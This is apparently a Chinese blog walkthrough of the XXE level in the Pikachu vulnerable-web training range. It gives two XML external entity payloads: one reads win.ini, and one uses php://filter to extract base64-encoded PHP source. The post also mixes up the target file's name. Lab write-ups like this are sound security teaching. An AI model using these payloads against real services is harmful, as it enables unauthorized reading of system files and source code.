Pikachu XXE详解
在这篇文章中将详细的分析Pikachu靶场中XXE关卡的通关过程
0x01 环境
系统:Windows11
服务器:PHPstudy2018
靶场:pikachu
0x02 XXE
首先进入这个关卡可以看到提示说:这是一个接收xml数据的api
明白了不用自己找漏洞,现成的只需要输入Payload就行
接下来介绍几种常用的Payload
查看系统文件内容
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]>
<foo>&xxe;</foo>
即可查看c:/windows/win.ini的内容
查看php源代码
查看php源代码一般用php伪协议php://filter
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=C:/Users/25801/Desktop/deom.php" > ]>
<foo>&xxe;</foo>
就可以得到base64编码的rce.php文件源代码,之后随便找一个base64解码网页解码就行
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 分享4款.NET开源、免费、实用的商城系统
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· 上周热点回顾(2.24-3.2)